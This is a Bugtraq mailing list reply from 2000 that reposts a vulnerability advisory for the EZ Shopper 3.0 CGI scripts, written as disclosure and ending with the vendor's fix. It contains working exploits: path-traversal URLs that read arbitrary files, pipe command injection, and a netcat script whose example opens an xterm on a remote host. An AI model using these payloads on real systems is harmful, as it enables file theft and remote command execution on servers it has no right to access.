Bugtraq mailing list archives
Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File List Disclosure Vulnerability
From: suid () SNEAKERZ ORG
Date: Wed, 15 Dec 0100 03:04:17 +0000
Uhh... guys i dont really mean to dis you but... It sometimes pays to research a bit before releasing advisories. Here is something i posted (to bugtraq no less) on the 28 of feb this year. k thx bye suid () suid kg - EZ Shopper 3.0 remote command execution. Software: EZ Shopper 3.0 URL: http://www.ahg.com/software.htm#ezshopper Version: Version 3.0 Platforms: Unix, NT Type: CGI, Input validation problem Vendor status: Notified 26/02/2000 Date: 26/02/2000 Summary: Anyone can execute any command on the remote system with the priveleges of the web server. Anyone can read any file on the remote system which the webserver has access to. Vulnerability: The perl code does no input validation and performs an open() on a user supplied input. Exploit: (1) loadpage.cgi - view any file. Firstly using your web browser find the current path (cwd): http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ You will receive an error message like: Cannot open file /home/www/shop/XYZ Now simply use (example based on the above cwd): http://www.example.com/cgi-bin/loadpage.cgi? user_id=1&file=../../<path>/<file> (2) loadpage.cgi - execute any command. This example shell script uses netcat to communicate with a HTTP proxy and exploit the script: ------------------------CUT------------------------ #!/bin/bash echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi? user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080 ------------------------CUT------------------------ A usage example would be: $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display% 20123.123.123.123:0 (3) search.cgi - view files (retarded tho) and execute commands. Simply replace the database field with piped commands or path/filename. http://www.example.com/cgi-bin/search.cgi? user_id=1&database=<insert here>&template=<or insert here>&distinct=1 Note if you use the database field a valid template is probably needed and vice versa. Workaround: The vendor, AHG Inc, has released a fixed version, download it from their website and install the fixed version.
Current thread:
- NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File List Disclosure Vulnerability Nsfocus Security Team (Dec 14)
- <Possible follow-ups>
- Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File List Disclosure Vulnerability suid (Dec 16)